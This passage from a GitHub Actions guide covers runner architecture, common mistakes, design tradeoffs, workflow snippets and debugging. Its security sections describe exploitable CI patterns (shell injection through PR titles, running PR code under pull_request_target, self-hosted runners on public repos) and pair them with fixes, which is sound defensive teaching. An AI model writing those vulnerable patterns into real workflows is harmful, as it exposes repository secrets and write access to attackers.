- The runner agent is C#. It’s a fork of the Azure Pipelines agent. As of 2025, GitHub has stopped accepting external contributions to the runner repo, which suggests an architectural rewrite may be coming.
- The job pickup uses long-poll HTTPS, not push. Runners reach out to GitHub, not the reverse. This is why self-hosted runners only need outbound network access — they don’t need an inbound port. Important for firewalls and VPCs.
- The Actions service was re-architected in 2024-2025. GitHub’s older infrastructure couldn’t keep up with the 23M+ jobs/day load and was redesigned for the next decade. This is also why the new “Broker API” has slightly different semantics than the older Azure Pipelines API the runner was originally built against.
- Cache and artifact storage are separate systems. They have different size limits, different retention, and different rate limits (200 cache uploads/min, 1500 cache downloads/min per repo).
For self-hosted Kubernetes runners under Actions Runner Controller (ARC), the picture has more pieces:
- The ARC controller-manager pod runs in your cluster.
- A Listener pod long-polls GitHub for jobs targeting your scale set.
- When a job arrives, the Listener creates an ephemeral runner pod via Kubernetes APIs.
- The pod fetches a JIT (just-in-time) registration token from GitHub, registers as a runner, accepts the job, runs it, deregisters, and is deleted.
- Repeat.
The ephemerality is essential. A persistent runner that runs job A and then job B can be poisoned by job A’s malicious code persisting state into job B. Ephemeral runners eliminate this — every job gets a fresh container. (GitHub-hosted runners are ephemeral by construction.)
7. The Things That Bite You
Six gotchas that bite roughly everyone in their first year. Each one reduces back to a Section 5 mental model violation.
7.1 You forgot actions/checkout
Expected: “I’m in CI — of course my code is here.”
Reality: A fresh runner has nothing. Your repo is not checked out unless you explicitly run actions/checkout. The first failed step that complains it can’t find package.json is almost always this.
Why: Runners are generic compute. The runner doesn’t know which repo’s code you want, at which ref, with what depth. actions/checkout is a step like any other.
Fix: Add - uses: actions/checkout@v4 as the first step. By default it does a shallow clone of the triggering ref, which is what you want 95% of the time.
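For the remaining cases, the usual adjustment is fetch-depth. A brief sketch contrasting the default with a full-history checkout; the job names are illustrative.

```yaml
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4        # default: shallow clone, depth 1
      - run: npm ci && npm test
  version:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0                 # full history and tags
      # Tools that walk the commit graph need more than a single commit.
      - run: git describe --tags --always
```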
7.2 Expression injection via PR titles, branch names, issues
Expected: ${{ github.event.pull_request.title }} is just a string.
Reality: It’s substituted into the shell before the runner runs the shell. Strings can contain shell metacharacters. (Mental Model 2.)
Why: Pre-execution expression evaluation. The YAML engine doesn’t know the shell’s quoting rules.
Fix: Always pass user-controlled data via env:, never inline. actionlint and zizmor flag this automatically. Also: branch names, email addresses, and even github.head_ref are user-controllable.
7.3 pull_request_target plus checkout of the PR head
Expected: “I want to run tests on the PR’s code with my secrets so I can post a coverage comment.”
Reality: pull_request_target runs in the base repo’s context with secrets and write permissions. If you then check out and execute the PR’s code (ref: ${{ github.event.pull_request.head.sha }} followed by npm ci or make test), you’ve handed an external attacker a shell with your secrets and write access to your repo.
Why: pull_request_target was created so you could safely label and comment on PRs, not so you could build PR code with elevated privileges. The naming is regrettable.
Fix: Don’t check out PR code in pull_request_target. Use the pull_request trigger to build (no secrets, safe) and the workflow_run trigger to consume the build artifacts (with secrets, but not running PR code). Be careful here too: workflow_run has its own subtle issues, so treat artifacts as untrusted and validate them before extracting. The “Keeping your GitHub Actions and workflows secure” series from GitHub Security Lab is the canonical reading on this.
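The two-workflow split might look roughly like this. It is a sketch under assumptions: the file paths, workflow names, and the coverage/ directory are hypothetical, and the privileged half stops at inspecting the artifact rather than posting a comment.

```yaml
# File 1 (hypothetical path: .github/workflows/ci.yml)
# Unprivileged: builds and tests the PR code with a read-only token and no secrets.
name: CI
on: pull_request
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
      - uses: actions/upload-artifact@v4
        with:
          name: coverage
          path: coverage/
---
# File 2 (hypothetical path: .github/workflows/coverage-comment.yml)
# Privileged: runs from the default branch and never checks out or executes PR code.
name: Coverage comment
on:
  workflow_run:
    workflows: ['CI']
    types: [completed]
permissions:
  actions: read          # needed to download artifacts from another run
  pull-requests: write
jobs:
  comment:
    runs-on: ubuntu-latest
    if: github.event.workflow_run.conclusion == 'success'
    steps:
      - uses: actions/download-artifact@v4
        with:
          name: coverage
          path: untrusted-coverage/
          run-id: ${{ github.event.workflow_run.id }}
          github-token: ${{ secrets.GITHUB_TOKEN }}
      # Everything under untrusted-coverage/ is attacker-controlled data:
      # validate it, and never execute or source it.
      - run: ls -lR untrusted-coverage/
```

The design point is that the only thing crossing from the unprivileged run to the privileged one is a data file, which the second workflow must still treat as hostile input.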
7.4 Caches don’t update when you think they do
Expected: “I cached ~/.npm, so my installs are fast.”
Reality: Cache entries are write-once. Once an entry exists for a given key, future runs with the same key restore it but don’t update it. Your cache becomes a fossil.
Why: GitHub designed caches to be immutable for the same key — concurrent updates would otherwise create races. The intended pattern is: key on something that changes when dependencies change (the lockfile hash), with restore-keys: for partial-match fallback.
Fix: Always include hashFiles('**/<lockfile>') in your cache key. For language ecosystems, prefer the cache: option of actions/setup-* actions, which gets this right by default.
7.5 The permissions: block is all-or-nothing per scope
Expected: “I added pull-requests: write so my workflow can comment on PRs.”
Reality: The moment you set any permissions: value, all unspecified permissions are forced to none. If you previously implicitly had contents: read (because the repo default was permissive), you’ve just lost it.
Why: Security by default — explicit is better than implicit. The platform interprets a permissions: block as “I am declaring exactly what I need.”
Fix: When you set permissions, list every permission the workflow needs. The minimum for almost any workflow is contents: read. For OIDC, add id-token: write. For PR comments, pull-requests: write. For pushing back to the repo, contents: write.
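As a sketch, a workflow that checks out code and comments on PRs would declare both permissions explicitly:

```yaml
# Sketch: a workflow-level block for "check out code, then comment on the PR".
permissions:
  contents: read         # without this, actions/checkout fails on a private repo
  pull-requests: write   # the permission you actually came here to add
  # Every scope not listed here (issues, packages, id-token, ...) is now "none".
```

The same block can also be placed under an individual job when only one job needs the elevated scope.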
7.6 Self-hosted runners on public repos are a remote shell
Expected: “I’ll use my home server as a self-hosted runner so my open-source project’s CI is faster.”
Reality: Anyone can submit a PR. PRs run CI. CI runs on your runner. Therefore anyone has shell access to your runner.
Why: GitHub-hosted runners are isolated ephemeral VMs by design. Self-hosted runners are your infrastructure, with whatever access you configured. If your runner has access to your home network, prod credentials, or SSH keys, an attacker submitting a malicious PR has access to all of it.
Fix: Never use self-hosted runners on public repos unless (a) you require manual approval for first-time contributors (a setting GitHub provides), (b) the runner is fully ephemeral and network-isolated, and (c) you’ve thought hard about what’s reachable from the runner. The official GitHub docs warn you about this; a surprising number of projects ignore the warning.
8. The Judgment Calls
The differences between someone who copies workflows from Stack Overflow and someone who designs CI for a 200-engineer org. None of these have one right answer; you’re navigating tradeoffs.
8.1 GitHub-hosted vs self-hosted runners
Option A: GitHub-hosted. Free for public repos, generous free tier for private. Pre-loaded toolchains. Ephemeral by construction. No infra to maintain. SLA-backed by GitHub.
Option B: Self-hosted. You operate the compute. Cheaper at scale (potentially 90% less per minute via spot/preemptible instances). Access to your VPC. Custom hardware (ARM, GPU, big-RAM). But you own scaling, security, patching, runner image maintenance.
The real signal: at what monthly minute count does self-hosted cross over to break-even? For most teams, that’s around 30,000-50,000 minutes/month. Below that, the engineering cost of operating self-hosted exceeds the savings. Above that, self-hosted starts paying for itself — but only if you’ve built the operational muscle. The hidden cost: someone has to maintain runner images, manage cache, handle Docker Hub rate limits, monitor pod failures.
What experienced teams choose: A hybrid. GitHub-hosted for everything by default. Self-hosted for the specific workflows that benefit (very large builds, GPU jobs, private-network access). Don’t go all-self-hosted unless you have a platform team that wants this as their job.
8.2 Composite action vs reusable workflow
Option A: Composite action. Bundles steps. Lives in a job, shares the job’s runner. Cannot use a secrets: block (you pass secrets as inputs). Supports if: on individual steps, though early versions did not. Compact in workflow run output (one collapsible group).
Option B: Reusable workflow. Bundles whole jobs. Each called job gets its own runner. Has secrets: inherit. Each job and step appears separately in run output. Can be invoked from a matrix, but that was a later addition and still carries restrictions.
The signal: are you sharing steps within a job or jobs across workflows? “Set up Node, install deps, restore cache” is a composite action — it’s a fragment of a job. “Build, scan, sign, publish” is a reusable workflow — it’s a whole pipeline.
What experienced teams choose: Composite actions for the small-and-frequent (setup, lint, format), reusable workflows for the large-and-shared (security scanning pipeline, deploy pipeline). A common org pattern: a templates repo containing reusable workflows that all repos call, plus per-repo composite actions for repo-specific glue.
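To make the distinction concrete, here is a sketch of both mechanisms side by side. The action path, the my-org/workflow-templates repo, and deploy.yml are hypothetical names chosen for illustration.

```yaml
# File 1 (hypothetical path: .github/actions/setup-node-deps/action.yml)
# A composite action: a fragment of a job that runs on the caller's runner.
name: Setup Node and install deps
description: Set up Node with npm caching, then install dependencies
inputs:
  node-version:
    description: Node.js version to install
    default: '20'
runs:
  using: composite
  steps:
    - uses: actions/setup-node@v4
      with:
        node-version: ${{ inputs.node-version }}
        cache: npm
    - run: npm ci
      shell: bash          # run steps in a composite action must declare a shell
---
# File 2: a caller workflow that uses both mechanisms.
name: CI
on:
  push:
    branches: [main]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: ./.github/actions/setup-node-deps   # composite: steps inside this job
      - run: npm test
  deploy:
    needs: test
    # Reusable workflow: called at the job level, brings its own jobs and runners.
    uses: my-org/workflow-templates/.github/workflows/deploy.yml@v1
    secrets: inherit
```

Note where each one is invoked: the composite action appears under steps:, the reusable workflow replaces the whole job body.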
8.3 Tag pinning vs SHA pinning for third-party actions
Option A: Tag (@v4 or @v4.1.2). Convenient, readable, gets bug fixes automatically. Mutable — the maintainer (or an attacker who compromises the maintainer) can change what the tag points to.
Option B: Full commit SHA (@08c6903...). Immutable. Cannot be changed without a SHA-1 collision. Inscrutable to read. Stale by default — won’t get fixes until you update.
The signal: what’s the blast radius if this action is compromised? For actions/checkout, the blast radius is “the checked-out code.” Bad but bounded. For an action that has access to deploy secrets and writes to your registry, the blast radius is the entire production system.
What experienced teams choose: SHA-pin everything third-party that touches secrets, deploys, or publishes. Use Renovate or Dependabot to keep the SHAs updated with a 7-14 day cooldown — most supply chain attacks are caught within a week of the malicious version landing. Tag-pin first-party actions/* for low-risk operations. Major orgs in 2026 increasingly enforce SHA pinning at the org level (a feature GitHub shipped in 2025).
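In practice the pinning and the cooldown are two small pieces of config. A sketch, assuming Dependabot's cooldown option is available in your setup; some-org/deploy-action and the version comment are hypothetical, and the SHA is deliberately a placeholder:

```yaml
# In a workflow: pin to a full commit SHA and keep the human-readable tag as a comment.
# <full-40-character-commit-sha> is a placeholder, not a real commit.
steps:
  - uses: some-org/deploy-action@<full-40-character-commit-sha> # v2.3.1
---
# Hypothetical .github/dependabot.yml: weekly update PRs, delayed by a cooldown.
version: 2
updates:
  - package-ecosystem: github-actions
    directory: /
    schedule:
      interval: weekly
    cooldown:
      default-days: 7    # wait a week after a release before proposing it
```

The trailing version comment is what keeps SHA pins reviewable: the update PR changes both the SHA and the comment, so the diff still says which release you moved to.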
8.4 Long-lived secrets vs OIDC
Option A: Stored secrets. AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY in repo secrets, valid forever. Simple. Familiar. Works for any service.
Option B: OIDC. Cloud provider trusts GitHub’s OIDC issuer. Workflow mints a short-lived JWT, exchanges it for cloud credentials valid for 1 hour. No long-lived secrets in GitHub.
The signal: does your target system support OIDC? AWS, GCP, Azure, npm, PyPI, RubyGems, NuGet, Crates.io, HashiCorp Vault, Databricks — yes. Some smaller SaaS — no.
What experienced teams choose: OIDC always when supported. The setup cost (configuring an IAM identity provider and trust policy) is real but one-time. The ongoing cost is zero: no rotation, no long-lived credential stored in GitHub, and nothing durable for an attacker to exfiltrate. If a service doesn’t support OIDC, store the secret at the environment level with required reviewers rather than at repo level.
8.5 Environments — when to use them
Option A: No environments. Direct deploy from CI. Fast. Simple.
Option B: Environments with gates. Deploy job declares environment: production. Production environment requires manual approval, restricts to main, holds production-specific secrets.
The signal: is “deploy” reversible quickly? If a bad deploy means a 30-minute rollback and a public incident, gate it. If a bad deploy means the next merge in 90 seconds fixes it, don’t.
What experienced teams choose: Environments are the single most underrated security primitive in Actions. They give you (a) per-environment secrets, (b) manual approvals, (c) branch restrictions, (d) wait timers, (e) audit trail. They’re free. Use them for anything touching production. The cost is that your team has to actually approve deploys, which adds latency — but that latency is the point.
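On the YAML side a gated deploy is a single extra key; the approvals, branch rules, and wait timers are configured under Settings → Environments rather than in the workflow. A sketch, with a hypothetical deploy script and secret name:

```yaml
# Sketch: scripts/deploy.sh and DEPLOY_TOKEN are hypothetical.
jobs:
  deploy:
    runs-on: ubuntu-latest
    environment: production        # the job waits here until protection rules pass
    permissions:
      contents: read
    steps:
      - uses: actions/checkout@v4
      - run: ./scripts/deploy.sh
        env:
          # Resolved from the production environment's secrets once the job is approved.
          DEPLOY_TOKEN: ${{ secrets.DEPLOY_TOKEN }}
```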
8.6 Matrix sizing — when does parallelism stop helping
Option A: Wide matrix. Test on every supported version × every OS × every variant. Twenty parallel jobs.
Option B: Narrow matrix. Test on the most-common combination on every PR. Run the wide matrix nightly or on release.
The signal: what’s the marginal probability that a PR breaks on, say, Python 3.10 / Windows specifically, given it passes on Python 3.12 / Linux? For most projects, that probability is low. For projects with platform-specific code, it’s high.
What experienced teams choose: Narrow on every PR (one row of the matrix), wide on the merge to main and on a nightly schedule. This roughly 5x’s your perceived CI speed without giving up coverage. Critical projects (Django, Rust libraries, etc.) need wide matrices on every PR; for application code, narrow is usually fine.
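One way to get "narrow on PRs, wide elsewhere" from a single workflow file is to choose the matrix values with an expression. A sketch, assuming a Python project tested with pytest; the version and OS lists are examples only:

```yaml
name: Tests
on:
  pull_request:
  push:
    branches: [main]
  schedule:
    - cron: '0 6 * * *'
jobs:
  test:
    strategy:
      fail-fast: false
      matrix:
        # PRs get a single row; pushes to main and nightly runs get the full grid.
        os: ${{ github.event_name == 'pull_request' && fromJSON('["ubuntu-latest"]') || fromJSON('["ubuntu-latest", "windows-latest", "macos-latest"]') }}
        python: ${{ github.event_name == 'pull_request' && fromJSON('["3.12"]') || fromJSON('["3.10", "3.11", "3.12"]') }}
    runs-on: ${{ matrix.os }}
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: ${{ matrix.python }}
      - run: python -m pytest    # assumes pytest is installed by an earlier step or the project setup
```

Two separate workflow files (one per trigger) achieve the same thing with less cleverness; the expression form just keeps the job definition in one place.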
8.7 Triggering on every push vs gating triggers
Option A: Trigger on push to all branches. Every commit gets CI. Maximum signal.
Option B: Trigger on PR + push to main. Branches get CI when you open a PR. main gets CI on merge.
The signal: how much do you pay per minute, and how many feature branches see how many WIP commits?
What experienced teams choose: PR + main, almost universally. Combined with concurrency: cancel-in-progress: true, this means each PR has at most one in-flight CI run, and unmerged work-in-progress doesn’t burn minutes. Cuts CI cost dramatically. Add paths: filters in monorepos so doc-only PRs don’t trigger full builds.
8.8 Reusable workflows in your own org vs forking community templates
Option A: Build internal reusable workflows from scratch. Full control. No external dependencies. High maintenance.
Option B: Fork or compose from community templates (actions/starter-workflows, philips-labs/terraform-aws-github-runner, etc.).
The signal: how generic is the pipeline? “Run npm test, deploy to S3” is generic. “Deploy to our internal Kubernetes cluster with our service mesh annotations” is not.
What experienced teams choose: Internal reusable workflows for org-specific patterns (deploy, release, security scan). Community templates as starting points only, with the understanding that you’ll diverge. Treat any external workflow you import the same as any external action — pin it, review it, watch for updates.
8.9 Logs and artifacts — how much retention do you actually need
Option A: Default retention (90 days). Easy. Expensive at scale.
Option B: Aggressive retention reduction (7-14 days for most artifacts).
The signal: When did you last look at a 30-day-old artifact? If the answer is “never except for compliance,” you’re paying for storage that nobody uses. At GitHub’s storage rates (~$0.008/GB/day for Actions storage), a team uploading 5GB/day with default 90-day retention is paying ~$100/month for stale data they will not look at.
What experienced teams choose: 7-day retention for build artifacts (tests, coverage, intermediate builds), 30-90 days only for release artifacts and audit logs. Set retention-days: explicitly in actions/upload-artifact. Most teams discover this only after their bill spikes.
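The storage figure can be checked with steady-state arithmetic, assuming a constant 5 GB/day upload rate, a 30-day month, and the ~$0.008/GB/day rate quoted above:

```latex
\begin{align*}
\text{stored at steady state (90-day retention)} &= 5\ \tfrac{\text{GB}}{\text{day}} \times 90\ \text{days} = 450\ \text{GB} \\
\text{monthly cost at 90 days} &\approx 450\ \text{GB} \times \$0.008 \times 30 = \$108 \\
\text{monthly cost at 7 days} &\approx (5 \times 7)\ \text{GB} \times \$0.008 \times 30 = \$8.40
\end{align*}
```

Under those assumptions, cutting retention from 90 days to 7 reduces the stored volume, and therefore the bill, by a factor of about 13.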
8.10 To act or not — local workflow testing
Option A: Test workflows by pushing to a branch. Authentic, slow, public.
Option B: Run workflows locally with act (nektos/act). Fast, private, imperfect emulation.
The signal: how often are you iterating on workflow YAML?
What experienced teams choose: act for the rapid iteration phase (“does this even parse”), real GitHub for the validation phase (“does this work end to end with real secrets and OIDC”). act cannot perfectly emulate everything — OIDC, GitHub API context, some action behaviors differ — but it’ll catch 80% of mistakes in 10% of the time. Combine with actionlint for static analysis.
9. The Commands and APIs That Actually Matter
The 20% you reach for 80% of the time. Grouped by task.
Triggering work
on:
  push:
    branches: [main]
    paths-ignore: ['**/*.md']
  pull_request:
    types: [opened, synchronize, reopened]
  workflow_dispatch:
    inputs:
      ref: { type: string, required: true }
  schedule:
    - cron: '0 6 * * *'
  workflow_call: {} # for reusable workflows
  workflow_run:
    workflows: ['CI']
    types: [completed]
Checking out code
# Default: triggering ref, shallow clone (depth=1)
- uses: actions/checkout@v4
# Full history (needed for tools like semantic-release)
- uses: actions/checkout@v4
  with: { fetch-depth: 0 }
# A specific ref
- uses: actions/checkout@v4
  with:
    ref: ${{ github.event.pull_request.head.sha }}
    persist-credentials: false # if you don't want git ops to use the token
Setting up languages
- uses: actions/setup-node@v4
  with: { node-version: '20', cache: 'npm' }
- uses: actions/setup-python@v5
  with: { python-version: '3.12', cache: 'pip' }
- uses: actions/setup-go@v5
  with: { go-version: '1.22', cache: true }
- uses: actions/setup-java@v4
  with: { distribution: 'temurin', java-version: '21', cache: 'gradle' }
The cache: parameter is the easy win — it integrates with actions/cache automatically using the right paths and lockfile hashes.
Caching arbitrary paths
- uses: actions/cache@v4
  with:
    path: |
      ~/.cargo/registry
      target
    key: cargo-${{ runner.os }}-${{ hashFiles('**/Cargo.lock') }}
    restore-keys: cargo-${{ runner.os }}-
Sharing data between jobs
# Upload
- uses: actions/upload-artifact@v4
  with:
    name: build-output
    path: dist/
    retention-days: 7
# Download in a later job
- uses: actions/download-artifact@v4
  with: { name: build-output, path: dist/ }
# Job outputs (for small strings)
jobs:
  build:
    runs-on: ubuntu-latest
    outputs:
      version: ${{ steps.v.outputs.version }}
    steps:
      - uses: actions/checkout@v4 # the VERSION file lives in the repo
      - id: v
        run: echo "version=$(cat VERSION)" >> "$GITHUB_OUTPUT"
  deploy:
    needs: build
    runs-on: ubuntu-latest
    steps:
      # Pass the value through env: rather than inlining the expression in the script
      - run: deploy "$VERSION"
        env:
          VERSION: ${{ needs.build.outputs.version }}
Cloud authentication via OIDC
permissions:
  id-token: write
  contents: read
# AWS
- uses: aws-actions/configure-aws-credentials@v4
  with:
    role-to-assume: arn:aws:iam::123456789012:role/GitHubActions
    aws-region: us-east-1
# GCP
- uses: google-github-actions/auth@v2
  with:
    workload_identity_provider: projects/123/locations/global/workloadIdentityPools/gh/providers/gh-prov
    service_account: ci@my-project.iam.gserviceaccount.com
# Azure
- uses: azure/login@v2
  with:
    client-id: ${{ secrets.AZURE_CLIENT_ID }}
    tenant-id: ${{ secrets.AZURE_TENANT_ID }}
    subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
Docker — the buildx pattern
- uses: docker/setup-buildx-action@v3
- uses: docker/login-action@v3
  with:
    registry: ghcr.io
    username: ${{ github.actor }}
    password: ${{ secrets.GITHUB_TOKEN }}
- uses: docker/build-push-action@v5
  with:
    context: .
    push: true
    tags: ghcr.io/${{ github.repository }}:${{ github.sha }}
    cache-from: type=gha
    cache-to: type=gha,mode=max
The type=gha cache-from/cache-to uses Actions’ cache for Docker layer caching — substantially faster than rebuilding from scratch.
Conditional execution
# Only on main
if: github.ref == 'refs/heads/main'
# Only if a previous step failed
if: failure()
# Always run (cleanup)
if: always()
# Combinations
if: success() && github.event_name == 'push' && !contains(github.event.head_commit.message, '[skip-deploy]')
Concurrency
# Cancel old PR runs when new commits land
concurrency:
group: ci-${{ github.workflow }}-${{ github.ref }}
cancel-in-progress: true
# Serialize deploys, queue rather than cancel
concurrency:
group: deploy-prod
cancel-in-progress: false
Common environment files (writing back to the workflow)
# Set an environment variable for subsequent steps
echo "VERSION=1.2.3" >> $GITHUB_ENV
# Set a step output
echo "tag=v1.2.3" >> $GITHUB_OUTPUT
# Add to PATH for subsequent steps
echo "/opt/mytool/bin" >> $GITHUB_PATH
# Add a Markdown summary visible in the run UI
echo "## Deploy results" >> $GITHUB_STEP_SUMMARY
echo "- ✅ Deployed v1.2.3" >> $GITHUB_STEP_SUMMARY
CLI — gh interaction with workflows
gh workflow list # list workflows in the current repo
gh workflow run ci.yml # trigger workflow_dispatch
gh workflow run ci.yml -f env=staging # with inputs
gh run list --workflow=ci.yml # list recent runs
gh run view <run-id> --log # full logs
gh run rerun <run-id> --failed # rerun failed jobs only
gh secret set DEPLOY_TOKEN # set a repo secret (prompts for value)
Useful actions you’ll reach for repeatedly
- actions/checkout@v4: every workflow
- actions/setup-{node,python,go,java,dotnet,ruby}@vN: language toolchains
- actions/cache@v4: arbitrary caching
- actions/upload-artifact@v4 / actions/download-artifact@v4: file passing
- aws-actions/configure-aws-credentials@v4: AWS OIDC
- google-github-actions/auth@v2: GCP OIDC
- azure/login@v2: Azure OIDC
- docker/{setup-buildx-action,login-action,build-push-action}@vN: Docker
- softprops/action-gh-release@v2: release publishing
- peter-evans/create-pull-request@v6: bot-driven PRs (e.g. for automated dep updates)
10. How It Breaks
Failure modes and the debugging workflow that finds them quickly.
10.1 The workflow doesn’t run at all
Symptoms: You pushed, you pushed again, the Actions tab shows nothing.
Causes, ordered by frequency:
- Wrong path (.github/workflow/ci.yml instead of .github/workflows/ci.yml; note the plural).
- YAML syntax error. The Actions tab usually shows a “Workflow file errors” section but only if the file is on the default branch. Errors on feature branches are silent.
- Trigger doesn’t match (e.g. branches: [main] and you pushed to master).
- Repo’s Actions are disabled (Settings → Actions → “Disable Actions for this repository”).
- The workflow is from an untrusted contributor’s first PR, awaiting approval (a setting).
Diagnosis: Run actionlint .github/workflows/*.yml locally. Check the default branch, not your feature branch. Check repo settings.
10.2 “Resource not accessible by integration”
Symptoms: A step that uses the GITHUB_TOKEN fails with permission errors.
Cause: The permissions: block doesn’t grant what the step needs. Or you set permissions partially and accidentally denied something.
Diagnosis: Read the permissions: block carefully. Remember: setting any value sets all unspecified to none. If you need to comment on PRs, you need pull-requests: write. If you need to push to the repo, contents: write. If you need to publish a package, packages: write.
Fix: Add the missing permission. Or in older repos, check Settings → Actions → General → Workflow permissions for the repository’s default token permissions (an org can set the same default org-wide).
10.3 “Could not assume role with OIDC”
Symptoms: AWS / GCP / Azure auth fails with a token validation error.
Causes:
- Missing id-token: write in the workflow’s permissions: block.
- The IAM role’s trust policy doesn’t match the workflow’s sub claim. Common mistakes: trusting the wrong repo, the wrong branch, missing :ref:refs/heads/main formatting.
- Mismatched audience (aud claim). AWS expects sts.amazonaws.com by default.
Diagnosis: Use the actions-oidc-debugger action to print the actual JWT claims, then match them against the trust policy. The most useful debugging step:
- name: Print OIDC claims
  run: |
    TOKEN=$(curl -s -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \
      "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=sts.amazonaws.com" | jq -r '.value')
    # JWT payloads are unpadded base64url: map to standard base64 and pad before decoding
    PAYLOAD=$(echo "$TOKEN" | cut -d '.' -f2 | tr '_-' '/+')
    while [ $(( ${#PAYLOAD} % 4 )) -ne 0 ]; do PAYLOAD="${PAYLOAD}="; done
    echo "$PAYLOAD" | base64 -d | jq .
10.4 Caches aren’t restoring
Symptoms: Builds are slow even though you have actions/cache configured.
Causes:
- The cache key includes something dynamic (timestamp, run ID), so it’s always a miss.
- Cache exceeded the 10 GB repo limit and was evicted.
- The cache is on a different OS than the runner; caches are scoped per runner.os.
- Different branches don’t share caches by default; only the default branch’s cache is restored on first run of a feature branch.
Diagnosis: Look at the action’s logs; it tells you whether it was a cache hit or miss and which key it used. Check repo Settings → Actions → Caches for current usage.
Fix: Cache keys should be stable for stable inputs. Use restore-keys: for prefix-fallback so partial matches still help.
10.5 Mysterious slowness, jobs sitting in queue
Symptoms: Workflow status says “Queued” for a long time before starting.
Causes:
- You hit your account’s concurrent job limit (typically 20-180 depending on plan, OS, runner type).
- You’re using a self-hosted label and no runner with that label is online.
- macOS or larger runners have lower concurrency limits and longer provisioning times.
Diagnosis: Check Settings → Actions → Runners for self-hosted health. Check Actions billing for concurrency caps. The runner label in runs-on: must match advertised runner labels exactly.
10.6 “Job is in progress” but it isn’t
Symptoms: Run shows as in-progress for hours, no logs, no completion.
Causes:
- Runner crashed mid-job and didn’t report status. GitHub will eventually time it out at 6 hours.
- Self-hosted runner lost network connectivity.
- A tmate SSH session was opened and never closed.
Diagnosis: Check the runner’s process on the host. For GitHub-hosted runners, just cancel and rerun.
Fix: Add timeout-minutes: to all jobs. Default is 360 (6 hours), which is usually too long.
jobs:
  test:
    timeout-minutes: 20 # fail fast if something hangs
10.7 Secret doesn’t appear
Symptoms: ${{ secrets.MY_SECRET }} is empty.
Causes:
- The secret is at the repo level but the workflow is triggered by a fork PR. Forks don’t get secrets.
- The secret is at the environment level but the job didn’t declare environment:.
- Org secret access isn’t granted to this repo (org settings → secrets → repository access).
- Typo in the secret name. (Secrets are case-sensitive.)
Diagnosis: GitHub doesn’t tell you secrets are missing; they just appear as empty strings, and your downstream tool fails with a confusing error. You can if: ${{ env.X != '' }} to bail early with a clearer message.
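A guard step along those lines might look like the following sketch. DEPLOY_TOKEN and scripts/deploy.sh are hypothetical names; the secret is mapped into env: first because the secrets context can't be read directly in an if: condition.

```yaml
jobs:
  deploy:
    runs-on: ubuntu-latest
    env:
      DEPLOY_TOKEN: ${{ secrets.DEPLOY_TOKEN }}   # hypothetical secret name
    steps:
      - name: Fail early if the secret is missing
        if: ${{ env.DEPLOY_TOKEN == '' }}
        run: |
          echo "::error::DEPLOY_TOKEN is empty (fork PR, missing environment:, or org access?)"
          exit 1
      - run: ./scripts/deploy.sh                  # hypothetical deploy script
```

The guard costs one step and turns a confusing downstream auth failure into an error message that names the actual problem.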
10.8 The general debugging workflow
When you don’t know what’s wrong, in this order:
- Read the run page. Click into the failing job, the failing step. The exact error message is usually there.
- Compare to a known-good run. What changed in the workflow YAML? In dependencies?
- Re-run with debug logging. UI button: “Re-run with debug logging” → logs explode in size, including expression evaluation traces.
- Inspect environment variables. Add a step that prints env, the github context, and relevant secrets.* (the latter shows as *** in logs but tells you whether it was empty).
- Bisect with tmate. Insert mxschmitt/action-tmate@v3 into the workflow. SSH into the runner mid-execution and poke around. Indispensable for “it works on my machine” cases.
- Run with act locally. If the issue isn’t auth or context-dependent, act reproduces it locally without the push-and-wait cycle.
- Read the action’s source. Marketplace actions are open source. When actions/cache@v4 is doing something weird, look at the action’s repo. The issue tracker often has your bug already.
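For the "inspect environment variables" step, a throwaway debugging step could look like this sketch (MY_SECRET is a placeholder name; remove the step once you've found the problem):

```yaml
- name: Dump contexts for debugging
  env:
    GITHUB_CONTEXT: ${{ toJSON(github) }}
    MY_SECRET: ${{ secrets.MY_SECRET }}
  run: |
    echo "$GITHUB_CONTEXT"
    env | sort
    # Report presence only; never echo the secret itself.
    if [ -z "$MY_SECRET" ]; then echo "MY_SECRET is empty"; else echo "MY_SECRET is set"; fi
```

The contexts go through env: for the same reason as in 7.2: they contain user-controlled strings, so they should reach the shell as data, not as script text.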
11. The Downsides — Honest Accounting
Actions is a powerful, often-correct choice. It is also a system with deep, structural disadvantages that don’t go away with experience or better config. This is what you sign up for.
11.1 The supply chain attack surface is enormous and largely unmonitored
Where it comes from: Mental Model 1 (repo as identity) plus the marketplace model means workflows routinely pull in dozens of third-party actions, each with full execution capability inside your CI runner. A compromised action sees everything the workflow sees: secrets, GITHUB_TOKEN, OIDC tokens, source code. The 2025 tj-actions/changed-files compromise (where a stolen maintainer credential was used to repoint version tags at code that dumped CI secrets into build logs, putting the thousands of repos that used the action at risk) and the recurring npm Shai-Hulud worm propagating through OIDC publishing are not edge cases. They are the predictable consequence of running other people’s code with your credentials in your repo’s identity.
What it costs you: Real engineering time on pinning, cooldowns, and review. Real risk every time you add a new action. The maintenance work of keeping SHA-pinned actions updated without falling behind. Most teams in practice ignore this and run on tag pinning, accepting an unquantified attack surface in exchange for not thinking about it.
Dealbreaker when: You’re publishing to a package registry, deploying to production, or holding any kind of regulated data. The asymmetry is brutal — one bad action can leak everything.
What people think mitigates it but doesn’t: “I only use verified creators.” Verified creator status verifies identity, not security practices. Verified creators have been compromised. “I review the action’s code.” You reviewed it last month. The action’s main branch was force-pushed yesterday.
11.2 The expression injection class of bugs is structurally permanent
Where it comes from: Mental Model 2 — expressions evaluate before the runner sees the YAML. This is baked into the architecture; it can’t be fixed without breaking every existing workflow. GitHub’s mitigations (warnings in docs, actionlint, zizmor) are necessary but they don’t prevent the bug class. A motivated developer will write ${{ github.event.pull_request.title }} directly into a run: block forever.
What it costs you: Every workflow needs review for this specific anti-pattern. Every action you import inherits it. CVEs for marketplace actions of this exact shape get filed every few weeks.
Dealbreaker when: You’re maintaining open-source projects that accept PRs and process those PRs in any privileged context. The answer is essentially “don’t” — and that constraint shapes a lot of automation you might otherwise want.
